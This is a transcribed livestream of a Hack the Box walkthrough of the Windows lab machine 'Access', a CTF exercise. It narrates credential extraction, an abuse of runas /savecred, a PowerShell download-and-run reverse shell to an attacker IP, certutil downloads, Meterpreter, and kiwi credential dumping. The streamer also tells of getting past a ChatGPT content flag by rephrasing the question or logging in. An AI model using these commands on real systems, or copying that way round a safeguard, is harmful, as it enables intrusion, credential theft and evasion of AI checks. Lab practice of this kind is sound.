Sneaky steps and shadowy ways. Welcome to the lair where the code is crafty and the hacks are always ethical. Let's dive into the shadows. Alright, so I'm just continuing on with the access room on Hack the Box. It's an easy Windows retired machine. So just for kind of a quick recap, I did some recon and found out that ports 21, 23, and 80 were open, and they, let's see, so, we did, anonymous FTP login is allowed on FTP on port 21. Haven't really figured out anything to do with Telnet yet, and we haven't really looked at the web server yet either. But just from where we're kind of sitting, let's see. So, we were able to authenticate anonymously to the FTP service and found out that there were two directories, backups and engineer. In the backups directory, we found this backup.mdb file, which is a Microsoft Access database file. And I was having a tough time figuring out how to actually enumerate that and get any information out of it using either a command line tool or a GUI enabled tool. Finally, after looking at taking a quick peek at the write-up, I found out that I could use MDB tools, MDB tables specifically, to find out that there is a table called auth_user. Just looking at our tasks here. What table in the database has user passwords auth_user? Then the next thing we want to find out is what is the password for access control.zip. I'm assuming we're probably going to be using something like John to zip or zip to John in order to figure that out. But we were able to kind of dump the contents of the auth_user table, and we can see some usernames and passwords. So like we have this, I'm guessing, is probably gonna be for the website to log into that. Either of these could be like Telnet or FTP access. But anyway, moving along, we'll see if we can maybe crack the password for the access control .zip file. Let's see if we can do this. And then we need to output this to like hash.txt. I think that worked. Yes, okay, sweet. So now we can try to use John to crack this. I'll just try it like this first and see if we can just crack it. If it will just recognize what it is. It looks like it did. Recognizes it as zip. And now it's going to use its own built-in word list to see if we can crack this with John. So while we're doing that, let's go ahead and take a look at the website. I think it should just be on port 80, right? Huh. Oh, why is it... It's trying to connect with HTTPS. Can't actually connect to the web server for some reason. And it keeps defaulting to HTTPS. What happens if I curl it? Failed to connect. Okay. Might need to reset my VPN. Maybe that could be what the issue is. Because I don't even have connectivity to the target host. Okay. I still don't have connectivity. Huh. That's weird. Well, let's see. What if I do this? Saying it's filtered. Saying that's filtered too. I think normally you can ping these machines, so I think that's a pretty big issue. Yeah, let's terminate this and spawn a new machine then. It seems like this shouldn't be taking this long either. Let's try this. And just do zip, and then dash word list. Well, yeah, that's fine. Word list equals user share word list. that. It's a Windows machine. Use -N1. Oh, I see what you're saying. Yeah, no, that's not gonna work. I'm on a Linux terminal. Is that how I go about this? Dump the auth_user table and try those passwords on the... Oh, okay. Yeah, I'm not supposed to crack this. I'm supposed to try the passwords from... Okay, there we go. Do I have connectivity? Ah, now I do. Okay, that was weird. Alright. So... run this command back. There we go. Okay, I'll try these passwords against the zip archive now. Okay. Oh yeah, the easiest way usually to do this is to just do it through the actual file browser. What? Oh crap. Can't open the file browser. Let's see. Error when getting information for file/home/Kali. I changed my home directory, that's why it's inaccessible. Crap. Well, that's an issue. That's right. Well, crap. Oh. Could be a file permissions thing. I don't think so. Yeah, it's not. That doesn't even. /home/Cali doesn't even exist anymore. Because I completely renamed it. But now the file browser doesn't recognize that. Crap. That is an issue. No, it doesn't exist anymore. Right. Okay, so that is right, but when I try to open the file browser, it says failed to open /home/Kali, so it's still remembering that as the home directory and then saying that that doesn't exist. Maybe this one. Ah, there we go. Okay. Should work. Okay, so we're back to where we need to be. That did not open. Okay. Oh, there we go. Okay. We are back in business then. Sweet. Hey, documents, half the box, retired access, and then open this. Oh, whoops, no, that's not what to do. This, oh wait, oh yeah, here we go, no. Here we go, extract here, that's what I want. And then password, try admin first, that's the easiest to remember. And where did I have the command to see this passwords? I think it's in here. There we go. Okay, let's try this password. Da-da-da. Extract here. Enter password, paste. that did work. Okay, sweet. So then we have this .pst file. Okay, so here, what is the password for access control.zip? It is this. What is the password for the security user? Oh, right. This is like a, kind of like an Outlook backup file. Yeah, Microsoft Outlook personal storage file. Okay. Can I, let's see if I can do this. Let me just try to open this up with Sublime Text. Probably will not be able to get anything significant out of this. Is there an ad going on, probably? Guess we'll be right back. Sometimes I hate the ad notifications because I won't be paying attention and it will tell me that there's an ad, or when the ad is over, then it will pop up a notification for a short period of time and then it will go away. And so I think that there's an ad going when we've actually, we're back on the stream. It's really annoying. Okay, so it says, what is the password for the security user? So I have this Microsoft Outlook personal storage file, which is like a kind of like a backup file for your emails on Outlook. Not really sure what to do with that though. Tools to extract the PST file. libpst. Do I have that? Libpst. I do not have that, okay. I can probably just install that with app. Yeah. Okay, there's dev. Okay, yeah, this is what I want right here. Or this. The package includes the files needed for developing with libpst, including the header, static library, and documentation. I don't really need that. Okay, this is to read data from Microsoft Outlook PST files. Read PST, LSPST. Okay. I think I actually want this. LSPST? No, I don't have that. Okay. Sudo apt update and sudo apt install pst-utils. Probably fat fingered my password. Yeah, I did. Okay. Hopefully this works. So LSPST, list PST, MS Outlook personal folders, file data. Okay. Extract email messages. Extract contacts. Convert PST files to inbox and other formats. Okay. Yes. I do want to install it, please. Okay. Okay, so then it's going to be lspst-h. Let's see. -L to print the data. CC and BCC fields of emails to, by default, only the from and subject. Okay, so let's give that a shot. So lspst-l, and then the file is access control.pst. Aha! Okay. That gave us something. What is the password for the security user? Yeah, that doesn't seem like that's enough info, though. I don't think... Yeah, that's not... This isn't the password. Okay, yeah, that's not... It's not quite enough info. Is there actually a Kali mail client called Kmail? No. Okay. Interesting. Let's see. Okay, LSPST list data in PST files. Read PST, export data from PST files to a variety of formats, including Mbox, MH, and Kmail. Other packages like MB2, MD are available for subsequent conversions to mail, dir, and other formats. LSPST list data in PST files, so that's what I was using here. What if I just run this without any options? Okay, it does the same thing. What if I do -B? Okay. PST to LDIF. Extract contacts from a PST file and prepare them for input in LDAP. PST to DII, export data from PST files to summation, DII load file format. List PST MS Outlook personal folders file data. Nick to LDIF, PSTD to DII. Read PST. Do I have that? Read PST. Oh, I do have that. Okay. Let's see. What if I just run this without any options against the file? Opening PST file and indexes error opening file. Let's do this. No? Okay, I'm gonna install this and see if this is any better. How do I invoke this? Find a way to read the email inside the PST file and visit tools like read PST will be helpful. I just want to extract the emails. I guess I don't understand how to. I don't even have Thunderbird. Thunderbird mode. Write to extra.size and .type files. What if maybe I can output this to Thunderbird mode and install Thunderbird and read it? I can't open the file though. Opening file. Error opening PST file, no such file or directory. Error opening file. Oops. second. Did I somehow overwrite the file? Crap. It looks like that's what I might have done. Yeah, I think I accidentally overwrote the file. Okay, let's try that again then. No wonder that wasn't working. Okay. Okay, so that's working again. So what if I do read PST? Opening PST file and indexes, processing folder, deleted items, access control, 2 items done, 0 items skipped. Aha! So now there's a .mbox file. How can I open that? Can I open that with Thunderbird? Aha, yes I can. Okay. Let me try to install Thunderbird now. Okay. Oops. Oh, there we go. I don't want to set up an account, I just want to... Okay, how do I import this? Import .unbox file to use the import export tools ng add-on. First install the add-on, then right click a folder of the local folder section in Thunderbird. Select import export tools ng, import inbox file, and choose an import. Go to add-ons and themes. Import export tools ng. Paste. Oops. Add to Thunderbird. Add. Okay. Aha! There we go. I bet I didn't even need to install this add-on. Okay, here we go. The password for the security account has been changed to access controller. Oops, I don't want the period. Please ensure this is passed on to your engineers. Regards, John. Okay, so I don't need this anymore. Okay, got the password for the security user. To which OpenTCP port on access can we connect to get a shell after logging in as security? I'm guessing that's gonna be 23 telnet. Yep, okay. Okay, so I don't need this anymore. Let's see if we can log in via telnet now. Security. And password. And we're in. Sweet. Can we do... Okay, we can't do this. We have to do dir. Okay. Now I should be able to go into their desktop and get the user flag. Awesome. Okay. So there we go. Got that. Paste. That was rather challenging. I'm gonna say not too easy. Okay. What is the name of the executable? Blah, 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 blah. What is the name of the executable called by the link file on the public desktop? Okay, so go here. It is this. What? What is the name of the executable? Oh, what is the name of the executable called by the link file in the public? Okay. Let me run type against this. And I can't do tab complete, so I'll just do that. I can't do that. Oh, it probably has to be in what? There we go. Probably has to be in quotes. There we go. Let's see. Run as.exe. Yes. Okay. Okay. What Windows command, when given the /list option, will print information about the stored credentials available to the current user? What Windows command, when given the /list option, will print information about the stored credentials available to the current user? So I think you can do run as /question mark? No? Okay. Run as /question mark? Okay, cd into Windows system 32. And then try run as what? Okay. Oh geez. This is all borked now. There you go. Run as the exe /question. Run as the exe. Huh. Windows command, when given a /list option, will print information about the stored credentials. Oh wait, this isn't run as, is it? No. Not Windows command. When given the /list option, will print information about the stored credentials available to the current user. I'm just gonna Google this. Oh, CMD-key, that's right. Okay. Key. Or is it just CMD key? It's probably just CMD key. There we go. Okay. Let's see. What option can be given to the run as Windows command to have it use the saved credentials of run as that user? Include this leading slash. /creds? Is it /CMD key? No. Oh, save cred. It's gotta be save cred. Save cred. There we go. Okay. Submit the flag located on the administrator's desktop. Do I just like execute the LNK file? Oh crap. I was gonna put that in parentheses, but I forgot. Seems like that worked. So can I do run as now? No? How do I actually use run as? CMD/list. Okay. Run as slash let's see. /user access administrator /save cred. No, I'm still security. I feel like I'm on the right track, but I'm missing something. Let me look at the syntax again. Okay, so that part is right, I think. Yeah. Oh, I wonder if I need to access the website for this part, or if that even has any significance. Just a picture of some servers. I'm not sure there's really anything significant about the image or about the website at all. How do I privask using CMDQ and run as? Oh, wait a second. I think I know what I'm doing wrong. Run as / user access administrator / save cred CMD. I'm still security. How do I spawn? I don't know if I can do this in a terminal though. Program name, pass the program file. Okay, so you can do this. That's what I thought. Yeah, you can do this. Run as / user : and then I think this is just the host name. Oh, can I just do... Wait, this does say up here, though, that this is a domain password. So this... So this has to be the domain, and then... the user, and then you use /cred, and then we want a new command prompt. The following command starts an instance of the command prompt as an administrator on the local computer. But there's another piece to this. We have to use the LNK file to get this to work somehow. Can I, like, invoke run as using the LNK file? I don't think that worked. No, it didn't. Okay, no, that's not working. Okay, let's go to the root of C. This looks like an interesting directory. ZK Tico. ZK access 3.5. Oh, there's a lot in there. Let's see. Access.exe, access.config, access.mdb, access.pb, access.sql. What is the name of the executable called by the link file on the public desktop? There are fancy ways to parse a .lnk file, but using type to see its content should be enough to figure out the binary that it points to. Okay, yeah, I already did that. But how can I leverage the .lnk file to run as and then use run as to get a terminal as the administrator account? Probably need to go back and look at that and see how that actually works. I don't know if that's actually going to help though. Wait a second. I don't know why I can't just execute this. And then... There's one more component to this. There has to be. abuse this. Wait a second, can I do... I think that I still have to use the LNK file in some way. Maybe not, though. not work. Okay, what if I outlet this to a file instead? No. Yeah, that is not working. This does not work. Can't just run as. I have to somehow use this .lnk file to do it for me, I think. Really not sure how to do that. Maybe this will help. Of course, create an account to read the. God dang it. God, why? Why does there have to be a freaking paywall on this? So incredibly annoying. No, this is too complicated for what I need. Let's try this. Oh, let me guess. This just links to that paywalled. Yep, it does. Of course it does. Wait, can I just overwrite the file? It's not, I mean, that's, can I just do like echo run as, secret
S1Y_B0RG rated your channel with 10 viewers.
Thank you for the raid, Slyborg. Appreciate it. Welcome in, raiders. How was your stream, and what were you working on? And of course, there's gonna be an ad break here very soon. I am trying to finish up access on Hack the Box. I'm just trying to get the root flag now. So I'm just trying to figure out how to escalate my privileges to the administrator. Alright, and we're back. I got caught up there with an ad, I think, but as I was saying, I'm trying to escalate my privileges to administrator on access on Hack the Box. Finally was introduced to Metasploit. Nice, how did it go? It went okay, I think. Haha, lots of reading, not a lot of doing it. Ah, okay. Yeah, Metasploit is pretty cool. There's all kinds of neat things you can do with it. It's not really an actual command and control framework per se, but it's good for like penetration testing and doing CTFs. Okay, so trying to see if maybe yeah, type ccolon/users administrator desktop root context. Wonder if I can just echo this into this file and replace the contents and then run it and oh wait, actually probably want to actually output this to a file as well. And then put this into this file. Maybe that will work? Access is denied, of course. I kind of figured that would be the case. I didn't think I would be able to edit the file. Let's see. Oh, gotcha. Man, I'm running out of ideas for this. Into privask using .lnk file. No, I don't want to use it to bypass. It's not, it's a vulnerable link file. It's not a malicious link file. I'm trying to abuse it to escalate my privileges. Let's see. This, I think this is probably gonna be, yeah, creating a malicious LNK file. No, I don't want to do that. I want to escalate my privileges using an LNK file. I wonder if I can use, probably not use ChatGPT, and I'm gonna try it. In a lab, how can I use a vulnerable .lnk file to escalate my privileges if it invokes the run as command? See if this gets flagged or not. No, so good so far. Okay. Let's see. .lnk with writable target path. If the .lnk file uses run as to run a file at a path like, and you have write access to program.exe, you could replace it with a malicious executable. Ah! Damn it! Yeah, it got flagged and it erased everything. That's great. That does give me an idea, though. Because it looks like, this LNK file executes, run as against this file path, and then specifies the user, access /administrator, and then uses their saved creds, and then runs this. Okay, now I get it. I think I'm starting to get it a little bit more now. So it runs this access.exe file as administrator. Okay. So what if I replace this with cmd.exe? Well, I don't know. That's funny that it gets flagged like that. Lately I've been using ChatGPT for stuff like this, and stuff doesn't get flagged for some reason. Not sure if it's because you're not signed in with an OpenAI account. Yeah, that could be. I also might just not be using a prompt that is, you know, what's the word I'm looking for? You know, satisfactory enough for ChatGPT. I suppose I could try this logged in and see if that makes any difference. File to escalate my privileges if it invokes the run as command against an executable. See if that works. Sorry, I'm not showing this on stream because I'm logged in on my host machine, so I didn't want to go through logging in, but we'll see if maybe this works. Okay, so here, yeah, no worries, that's a smart move to not show on stream. Okay, so what I think I might be able to do is replace this access.exe program, if I can write here, with my own malicious payload and get a shell as the administrator. Let's give that a go. Okay, so I'm gonna cd to this directory. Shit, that's not what I meant to do. And then there should be access to exe. Yes. Can I delete that and replace it? Access is denied. Shit. And I can't edit the LNK file. Hey, with the way, I don't know if it's because I'm signed in or if I kind of rephrased the question a little bit, but it didn't flag it and delete it that time. I feel like that's gotta be the path somehow, is to either change the LNK file to point to a file that I upload, or to change the access.exe file to my own payload. Oh, you know what I should do? Okay, so if I go back to c:\users /public desktop, or yeah, I'll just do public. Whoops. Oh well. Wait, what? Where's the desktop? Weird. Okay. What if I run iCackles against this file? I just want to, so I can see the permissions that are set on it. Okay. Shit. Okay, so only built-in administrators in NT Authority System and Interactive have access to modify this file. Shit. Okay, what about... Let's see. Okay, so let me type out... God dang it. Using this through Telnet is terrible. Oh, this shell is just so bad. Let's see. Okay, so let me type this again. or run type against this to cat it out. Let's see. What permissions does this have? Built-in users can. I don't know what the I is. Maybe like interactive. I don't know. But I have read and execute access. Wait a second. Okay, so I'm gonna run iCackles against just this directory, not against the executable. What permissions? Yeah, what? Oh crap. Okay. ZK Techo, ZK access, C.5 backslash. What? The file name, directory name, or volume label syntax is incorrect. Is that not the name of the directory? That is the name of the directory. So colon backslash ZK Techo ZK access 3.5. Why can't I run iCackles against that? It's so weird. If you just run iCackles by itself, not specifying anything, does it check the permissions on the current directory? No. Okay. You do have to specify the directory. Okay. Oh, this actually goes over the permissions. Permission inherited from parent container. Oh, okay. That's what I is. And then this is obviously read and execute access, write only access. M is modify access. Okay. Inherited, read, execute. And I don't want to like try to. I don't think I can even add a file here if I wanted to. What I want to do is I want to replace this access executable, but I don't think I have the permissions to do that. I wonder if sharp up will give me any hints for what I could do here. Okay, if I can use cert util to get this on here. Wonder if I have. Let's see. Kind of permissions there. Access is denied. Shit. Oh wait, I can run. Can I write in the public desktop? I think I can. Okay, cert dash URL cache dash f//. My IP is 10.14.3, and then sharp up .c, sharp up .c. See if that works. Fuck. No, I don't have access. Jeez, why can't I write to the public desktop? Can I write in my downloads? Ah, yes I can. Okay, sharpup.exe audit. Oh, are you kidding me? This program is blocked by group policy. You're kidding me. It's annoying as shit. Maybe I can get WinPeace on here. They totally anticipated what I was gonna do. Yeah, can I use keys-ng, I think it is. And that, what? Is it just one? No? Let me do this. Oh, is it just peas? Okay, so install peas. This will create the binaries locally for linpeas and winpeas. Just have to run this. Copy. I could do the bat or the execute. Guess I'll do the execute. Let's copy, share, keys, and keys to here. What? Okay. Oh wait, I'm already in that directory. That's not what I want. Okay. There we go. There we go. Set up my web server again. Get this on my restart utils. Actually, before I do that, I'm renaming this because this is gonna be terrible to work with. Let's see, here we go. Yeah, insert util. Dash dash. F. Alright. We got that. I'm gonna save these results into Privis. Oh my god, really? Anything I could use for Privis is blocked by group policy on this machine. Seriously? Like any privilege escalation enumeration tool I want to use is blocked by group policy on this machine. God. They are not giving me a break at all. Does this work via the name? Because what if I changed it to be what if I change the name of it? Not Seth. Can I run it then? Is it just based on name? No, of course it's not. It actually uses signatures, probably. Damn it. I can't run any privilege escalation enumeration tools on here because they're all blocked by group policy. Ah, that's annoying. What if I... Oh, wait a second. What if I get the batch? One of these. Oh, and we're gonna have an ad here in about 5 seconds. I'll be right back. Alright, and we're back. Okay, so what I've done now is, I just copied the winpiece.batch file to this directory and then changed it so that it's easier to work with, set up my Python web server, and now I'm gonna try to see if maybe I can actually run this, or if it's going to be blocked by group policy again. Okay, let's see if I can run this. No, I can't. Of course. Huh. Oh wait, we still got some info though somehow. Anything? Doesn't look like it's anything useful though. It just basically ran system info. Oh, that's interesting. This is Windows Server 2008 R2 standard. This is a pretty old machine. Yeah. Okay, so that didn't help. Damn, how do I do this? I don't really have any permissions to change anything. Huh. I'm really feeling pretty stuck here now. So what do we know? We know that this LNK file runs access.exe as the administrator. From this directory. But we don't have permissions to replace this executable. For some reason I can't run iCackles against this directory. But I also can't... I don't have the permissions to change this file either. Which that probably wouldn't be what I wanted to do anyway. I might honestly just have to read the write-up and learn from it at this point, because I think I'm out of ideas. I'm on the last step. I just have to escalate my privileges to the administrator. I don't think this is significant yet. Oh, interesting. Okay, so how do I escalate my privileges? Oh, I did not think about doing that. Let's see. Identification of saved credential. A useful command to run when beginning enumeration is cmd key/list, which displays stored usernames and passwords or credentials. This reveals a stored credential for access /administrator, which is a domain password. Windows may store credentials for a number of reasons. One of them is that a sysadmin may have configured an application to run as an administrative user with the /savecred switch specified. There is no way in Windows to restrict use of the run as /savecred privilege to a single application. Once this has been configured, run as can be used to run any command with elevated privileges. Some reasons why a sysadmin may choose to run as...
Goblin life!
McGurks_TweetDown method followed your channel.
Thank you for the follow. Let's see, where was I? Let's see. Okay, so there's no way in Windows to restrict use of the run as /savecred privilege to a single application. Once this has been configured, run as can be used to run any command with elevated privileges. Some reasons why a sysadmin may choose to use run as /savecred are to keep them from having to repeatedly enter or provide the admin password, or it may be to run an application with elevated privileges in order to bypass application whitelisting or to allow write access to protected application directories. Typically, run as /savecred is used to create a shortcut which the user clicks to run the desired application. The commands below are used to enumerate all the accessible shortcut.lnk files on the system and examine them for the presence of the run as command. Interesting. Okay. Then it says it seems that the ZK access shortcut on the public desktop has been configured in this way. When inspecting the public user profile, the desktop folder is not immediately visible as it is a hidden folder. Oh, okay. It is possible to traverse the folder and list the files within. The folder is accessible to the built-in NT Authority interactive group. Users who log in interactively locally or over a remote desktop or telnet session will have the interactive SID in their access token. Ah, okay. So that's why we can actually run the, or read or CD into that directory. Let's see. Okay, then they ran iCackles against that. Then they ran whoami/groups. Everyone access telnet clients, built-in users into Authority Interactive. Okay. Privilege escalation. Okay. Exploiting run as /savecred. The following command is used to start a PowerShell reverse shell as access administrator. That's really all I had to do? I knew the idea was to get a reverse shell as the administrator, I just wasn't sure how to go about doing that. Yeah, so the .lnk file isn't even relevant. Like it's relevant initially, but it's just to show you that you can use run as to execute commands as the administrator. Okay. So I guess I'll create a PowerShell reverse shell. Let's see. Oh, I can probably do this with revshells.com. I think it is. Yes. Okay. PowerShell. Shell number 1, 2, 3. Oh wait. Oh, okay. So this downloads this admin.ps1 file from the attacker's machine and executes it in memory. Okay, and then you set up a netcat listener to receive the shell. Okay. So first I need to create a PowerShell reverse shell. This might work. I think this needs to be changed to PowerShell. Okay. Oh wait, I can put in my stuff here, that's right, and then generate it. Okay, 1010, 14.3, so I just need to change these last two octets. 14.3, and then I'm gonna do 1337. Okay, copy this and put this in a file. Let's call this admin.ps1. Throw all that in there and then take a look at that, save that. Yes. Okay, I'll set up my Python web server. I'll just copy, okay, oh wait, no I can't copy this, okay. Then I just need to change this last part. Oh jeez. Okay, I guess I have to do this. CIX new dash checked. Net dot web client dot download stream HTB /10.10.14.3 admin.ps1. And shit, before I run this, I need a netcat listener. Rev shell. Okay. So if I execute this, I mean, when I execute this, I hopefully will get a reverse shell as the administrator. Or not. I was wondering, is this all one thing? Is that why that... be one word, maybe? Okay, what if I... Oh shit, what did I just do? Wait. I'm guessing that's just one word and that's why it didn't work. Works, and of course it doesn't. Net.webclient.download string.
The Shy Hat rated your channel with 17 viewers.
Hell yeah! Goblin life! Ah!
Smooshkid followed your channel.
Thank you for the raid, Shy Hat. How was your stream? What are you working on? And thank you for the follow, Smoosh Kid. Appreciate it. Okay, I'm not gonna do this. Let's see. Oh yeah, I don't know. I do have to have PowerShell for that crap. Can I just do? Not sure if it even connected at all. Yeah, no, it didn't. Not really sure why though. Oh, it didn't even grab it. Yeah, it didn't connect. Yeah, it didn't even grab the shell. Crap. There's some kind of syntax error in here. Hack the Box Windows machine? Yes, I'm doing access on Hack the Box. It's an easy Windows retired machine. I got everything without using the write-up, but except for the Privesk, because the Privesk is kind of tricky for this. I had some idea of what I needed to do, but not really any idea of how to execute it. There we go. Yes, okay. There we go. Okay, there's the root flag. Easy peasy. Not too easy. While it's not needed to get the root flag on access, is it possible to extract the saved password? What is the administrator's password? Currently stored credentials now. Well, it's not needed to get the root flag on access. Is it possible to extract the saved password? What is the administrator's password? How do we go about doing that? I mean, we could use tools like Mimikatz, but I'm guessing that's probably going to be blocked by group policy as well. I gotta get some dinner, but have a great rest of the stream. Hack on. Oh, thanks, Shy. Let's see. Well, it's not needed to get the root flag on access. Is it possible to extract the safe password? What is the administrator's password? Extract safe password from credential vaults. This will open up the credential manager. I don't want to do that. What is the hint here? The creds are stored by the Windows Data Protection API, DP API. To abuse this, you'll need to find the master key and the encrypted blobs. Mimikatz is one tool that can do it. Okay, let's see. Windows System 32 config. How can I exfiltrate these? I think all I would really need is the SAM database and the system registry hive. But then I have to... Yeah, I think this is actually a little different about what it's talking about. Creds are stored by the Windows Data Protection API, DP API. To abuse this, you'll need to find the master key and the encrypted blobs. This is one tool that can do it. But can I run Mimikatz on here? Because it's probably gonna be... Oh wait, would I be immune to that? The group policy blocks though if I'm the administrator maybe? Maybe I could get Mimikatz on here. I could maybe get a interpreter shell and then load Mimikatz inside that process and do it that way. I don't know if... I feel like Mimikatz is probably going to be blocked by group policy too, though. Let's try it. MSF. Whoops. I can just use this. Oh, do I already have? Oh, I can just recreate this in this directory. Better to test it than not, yeah. Okay, let's see if we can use this. Okay, then my reverse shell. I'll go back to my desktop. Oops. Desktop. And insert util. Now in this tab, console -Q for quiet mode so I don't print out a banner and stuff. This is taking quite a while. It's probably because I think I can exit out of this now. Because this is hogging up a lot of system resources. Okay, still have my rev shell. Okay, there we go. Yeah. My rev shell is still hogging up a decent amount of resources, but at least I could do this now. Okay, so now I use multi-handler. Jeez, what is using so many freaking system resources? I closed out my telnet session. Now I just have my reverse shell and my VPN running. It's using up so much freaking resources. Does not tell me. I want to know the I want to know the binary that's causing that. Command? Yeah, that'll work. How do I specify a certain field? Do I just say the field? And then... Command? No. Filter any user, filter only e-user. Your hacker skills are too much for your computer to process. Okay, it seems like it's evened out a little bit now. I just don't know what's causing that. Okay, options. Okay, and it is using 444. Set lhost to 0, and I think that should be everything we need. Go ahead and run that, and we're slowing down here again for some reason. Oh, I'll just use the task manager. That's gonna be way easier to see what the heck is causing that. Let's see. CPU. Oh, it's freaking Firefox. Of course it is. Jeez. Of course it's Firefox. Okay, let me close this, close this, close this, close this. Maybe that'll help. Okay, so we started our reverse TCP handler. Let's see if we can execute shell. Get an interpreter session. What? Command shell session 1 is not valid and will be closed. Ah, shit. Is this not an x64 system? Could that be why? Oh, jeez. Okay. Let's see. This is really hard to read, but... Where does it say? Oh, okay, this is x64. What is the issue then? Not valid. Windows x64 interpreter reverse TCP 10.10.4.3. Output is 4.4.4.4. Format is exe. Output shell.exe. Sometimes the rev shell on Metasploit doesn't work. It's a good idea to retry to truly see if it went through. Yeah. Let's see. Are there targets? No. Oh, wait a second. I know what's wrong. It's the payload. I need to match the payload to the shell that I created. That's what's going on. Windows x64 interpreter reverse TCP. Run. That was the one thing I forgot to do. I needed to set the payload to match my payload. Okay, so let's try now and execute this. And it seems to be working now. Sweet. Okay, and we are access administrator. Okay, load QE. Creds, all. Not running a system. Okay. Get system. Okay, now I'm system. Creds, all. And there we go. There it is, right there. That was easy. Yay! Alrighty. Sweet. Let's see. Is there anyone on to raid? There is not. Alright, so I guess I'm gonna wrap up the stream there then. Thanks everybody who joined. Thank you for the raids, and thank you for coming in and joining my stream, raiders. And thank you all for the new follows as well. Yep, I'm gonna go ahead and end the stream here. Hopefully I'll see you again on Thursday. Hopefully you have a good day, afternoon, evening, whatever it is for you, wherever you are in the world. And hack the planet, and I hope to see you next time. It was a good box. Alright everybody, take care. You too, psyched. Hopefully I'll see you on Thursday if you're available to join.